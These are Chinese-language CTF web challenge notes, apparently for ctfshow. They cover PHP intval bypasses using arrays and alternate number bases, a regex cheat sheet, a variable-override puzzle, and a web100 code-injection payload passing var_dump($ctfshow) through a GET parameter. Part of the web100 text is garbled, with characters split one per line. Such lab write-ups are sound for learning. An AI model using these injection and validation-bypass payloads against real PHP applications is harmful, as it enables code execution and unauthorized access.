01
intval函数
通过数组绕过
02
进制转换or加个空格在前面。
payload
?num= 4476
?num=0x117c
?num=010574
03
符号 | 含义 |
---|---|
[abc] | A single character: a, b or c |
[^abc] | Any single character but a, b, or c |
[a-z] | Any single character in the range a-z |
[a-zA-Z] | Any single character in the range a-z or A-Z |
^ | Start of line |
$ | End of line |
\A | Start of string |
\z | End of string |
\s | Any whitespace character |
\S | Any non-whitespace character |
\d | Any digit |
\D | Any non-digit |
\w | Any word character (letter, number, underscore) |
\W | Any non-word character |
\b | Any word boundary character |
(a|b) | a or b |
a? | Zero or one of a |
a* | Zero or more of a |
a+ | One or more of a |
a{3} | Exactly 3 of a |
a{3,} | 3 or more of a |
a{3,6} | Between 3 and 6 of a |
. | Any single character |
(…) | Capture everything enclosed |
04
在linux下面表示当前目录是 ./
05
<?php
include("flag.php");
#若存在GET传值,用POST的值覆盖
$_GET?$_GET=&$_POST:'flag';
#flag参数等于flag,就用$_COOKIE进行覆盖。这里让flag参数不等于flag值就好了
$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';
$_GET['flag']=='flag'?$_GET=&$_SERVER:'flag';
#存在HTTP_FLAG参数等于flag,就出最终的flag答案
highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);
?>
06
web100
v
2
(
′
c
t
f
s
h
o
w
′
)
v2('ctfshow')
v2(′ctfshow′)v3,其中v2肯定是命令,v3传分号
v0是三个值相与,v2和v3不传数字和v1数字相与就为1
payload:
?v1=1&v2=var_dump($ctfshow)&v3=;
或者v3直接用内联注释注释掉
?v1=1&v2=var_dump($ctfshow)/*&v3=*/;